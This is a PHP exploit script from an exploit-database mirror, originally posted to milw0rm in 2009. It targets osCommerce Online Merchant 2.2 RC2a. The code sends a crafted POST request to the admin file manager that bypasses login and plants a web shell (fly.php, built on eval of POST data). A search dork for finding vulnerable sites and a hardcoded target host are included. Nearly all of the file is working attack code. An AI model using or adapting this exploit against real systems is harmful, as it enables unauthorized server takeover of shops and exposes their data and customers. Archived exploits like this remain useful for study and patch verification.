PageRenderTime 56ms CodeModel.GetById 23ms RepoModel.GetById 0ms app.codeStats 0ms

/exploits/php/webapps/9556.php

https://bitbucket.org/DinoRex99/exploit-database
PHP | 37 lines | 18 code | 0 blank | 19 comment | 0 complexity | 42ac25357275e00be35843823a9dd2eb MD5 | raw file
Possible License(s): GPL-2.0 
    

  1. <?php

    2. 

  2. print_r('

    3. 

  3. +---------------------------------------------------------------------------+

    4. 

  4. osCommerce Online Merchant 2.2 RC2a RCE Exploit

    5. 

  5. by Flyh4t

    6. 

  6. mail: phpsec@hotmail.com

    7. 

  7. team: http://www.wolvez.org

    8. 

  8. dork: Powered by osCommerce

    9. 

  9. Gr44tz to q1ur3n ãpuret_tãukãtoby57 and all the other members of WST

    10. 

  10. Thx to exploits of blackh

    11. 

  11. +---------------------------------------------------------------------------+

    12. 

  12. ');

    13. 

  13. $host ='democn.51osc.com';

    14. 

  14. $path = '/';

    15. 

  15. $admin_path = 'admin/';

    16. 

  16. $shellcode = "filename=fly.php&file_contents=test<?php%20@eval(\$_POST[aifly]);?>";

    17. 

  17. $message="POST ".$path.$admin_path."file_manager.php/login.php?action=save HTTP/1.1\r\n";

    18. 

  18. $message.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n";

    19. 

  19. $message.="Accept-Language: zh-cn\r\n";

    20. 

  20. $message.="Content-Type: application/x-www-form-urlencoded\r\n";

    21. 

  21. $message.="Accept-Encoding: gzip, deflate\r\n";

    22. 

  22. $message.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n";

    23. 

  23. $message.="Host: $host\r\n";

    24. 

  24. $message.="Content-Length: ".strlen($shellcode)."\r\n";

    25. 

  25. $message.="Connection: Close\r\n\r\n";

    26. 

  26. $message.=$shellcode;

    27. 

  27. $fd = fsockopen($host,'80');

    28. 

  28. if(!$fd)

    29. 

  29. {

    30. 

  30.     echo '[~]No response from'.$host;

    31. 

  31.     die;

    32. 

  32. }

    33. 

  33. fputs($fd,$message);

    34. 

  34. echo ("[+]Go to see U webshell : $host/fly.php");

    35. 

  35. ?>

    36. 

  36. 

    37. 

  37. # milw0rm.com [2009-08-31]
    38.